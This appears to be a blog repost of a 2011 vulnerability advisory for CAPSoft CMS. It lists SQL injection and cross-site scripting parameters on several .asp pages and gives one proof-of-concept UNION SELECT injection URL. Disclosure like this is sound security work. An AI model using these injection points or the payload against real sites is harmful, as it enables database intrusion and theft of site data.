CAPSoft CMS Multiple Vulnerabilities ~ Random stuff by yappare

Wednesday, March 23, 2011

CAPSoft CMS Multiple Vulnerabilities

on March 23, 2011 1 comment

Title : CAPSoft CMS Multiple Vulnerabilities
Vendor : http://www.capsoft.com.ar
Found by : p0pc0rn

SQL
---
Vulnerable Parameters are

Method = GET
------------
http://site.com/noticia.asp?id=[SQL]
http://site.com/imprimir.asp?tabla=[content_name]&id=[SQL]
http://site.com/product.asp?intProdID=[SQL]
http://site.com/productosporcategoria.asp?intCatalogID=[SQL]

POC
---
http://site.com/noticia.asp?id=1 union select 0 from test.a

Method = POST
-------------
buscador.asp
ingresar.asp

XSS
---
http://site.com/diseno_web.asp?pcia=[XSS]
http://site.com/productosporcategoria.asp?intCatalogID=[id_number]&strCatalog_NAME=[XSS]

thanks,
-p0pc0rn-

Unknown said...: agregame, dixpoint@gmail.com Bisness :D; March 27, 2011 at 9:49 PM

Random stuff by yappare

Wednesday, March 23, 2011

CAPSoft CMS Multiple Vulnerabilities

1 comments:

Text Widget

Popular Posts

Pages

Blog Archive

Recent Posts

Unordered List

Categories